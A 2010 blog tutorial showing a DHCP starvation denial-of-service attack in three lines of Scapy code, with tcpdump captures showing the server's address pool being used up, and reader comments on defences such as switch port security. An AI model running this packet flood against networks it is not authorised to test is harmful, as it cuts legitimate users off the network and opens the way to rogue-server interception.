Skip to content

DHCP Denial of Service with scapy

by foip on December 9th, 2010

1. Introduction

This is a small post explaining how to run a starvation attack against a DHCP server with only three lines of code (thanks to Scapy!).

Information & download regarding Scapy :

Information about DHCP Starvation attack :


2. Starvation attack with scapy

Running a starvation attack is nothing more than sending a lot of dummy DHCP requests, with random source MAC addresses. After few second, there is no more IP addresses available in the pool.

Warning: Don’t run this attack against networks you are not authorized !

[root@host1 ]$ scapy
Welcome to Scapy (v1.1.1 / -)
>>> conf.checkIPaddr = False
>>> dhcp_discover =  Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover,loop=1)
...............................................................^C
Sent 70 packets.

To stop the attack, simply press Ctrl+C.



Does it work ? Yes, take a look at the following tcpdump captures.

2.1. The DHCP queries:

[root@host2 ]$ tcpdump -n -e -i eth0 port 68
ec:51:e2:20:5b:93 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 64:38:62:38:63:65, length 244
8e:97:0f:18:8a:19 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 39:33:39:37:65:66, length 244
28:a7:45:35:c0:47 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 38:34:66:64:33:63, length 244
...


2.2. Then the DHCP responses:

00:23:20:56:53:f0 > 64:38:62:38:63:65, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.117.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 39:33:39:37:65:66, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.118.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 38:34:66:64:33:63, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.119.68: BOOTP/DHCP, Reply, length 305
...
 

3. The End

Hope you enjoy.


1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 5.00 out of 5)

Loading...

© 2010 – 2014, Fun Over IP. All rights reserved.

From → Hacking, Network

5 Comments
  1. Hi my friend,

    Thank you for this info. but how can i prevent this on my network?

    • foip permalink

      Hi, it depend your environment. See here some examples http://hakipedia.com/index.php/DHCP_Starvation

    • Goodies permalink

      Hello! You will need to enable port security. Setting may vary by distributor, but the main way I use to prevent this attack is to limit the number of MAC sources allowed from one port.

      Another thing that’s good to do is enable a single port to trust the legitimate DHCP server. When someone runs this DOS attack, they will easily be able to set up a rogue DHCP server acting as the default gateway, and become man in the middle.

  2. im just using a linux gateway serve as hotspot. can i prevent this using iptables? can you please tell me how to do it. im worried because i did your procedure and it consume all the ip and hang. i need to prevent this…

    • foip permalink

      I’m afraid to have no idea. Such attack are usually prevented on the switch “ports”. The goal is to limit the number of clients (MAC addresses) behind a physical port. Maybe Google know the solution for your environment ..
      Good luck.

Comments are closed.

© 2010-2019 Fun Over IP All Rights Reserved -- Copyright notice by Blog Copyright